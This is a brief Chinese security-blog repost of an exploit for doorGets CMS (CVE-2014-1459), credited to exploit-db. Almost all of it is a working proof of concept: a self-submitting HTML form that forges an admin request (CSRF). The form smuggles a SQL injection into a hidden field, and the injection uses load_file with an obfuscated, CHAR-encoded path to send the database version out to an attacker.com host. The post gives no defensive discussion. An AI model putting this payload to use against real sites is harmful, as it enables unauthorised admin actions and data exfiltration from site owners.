官网:http://www.doorgets.com/ CVE:
<a href=”http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1459″ rel=”nofollow” target=”_blank”>2014-1459</a> FROM:http://www.exploit-db.com/exploits/31521/ exp: <pre class=”brush: html; gutter: true”><form action=”http://[host]/dg-admin/?controller=rubriques” method=”post” name=”main”> <input type=”hidden” name=”_position_down_id” value=”1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) — “> <input type=”hidden” name=”_position_down_position” value=”1″> <input type=”hidden” name=”_position_down_submit” value=”1″> <input type=”hidden” name=”_position_down_type” value=”down”> <input type=”submit” id=”btn”> </form> <script> document.getElementById(’btn’).click(); </script></pre>
|
-
上一篇: PowerCDN官网SQL注入用户站点有被劫持风险 - 网站安
下一篇: [安全科普]你必须了解的session的本质 - 网站安全
还没有人抢沙发呢~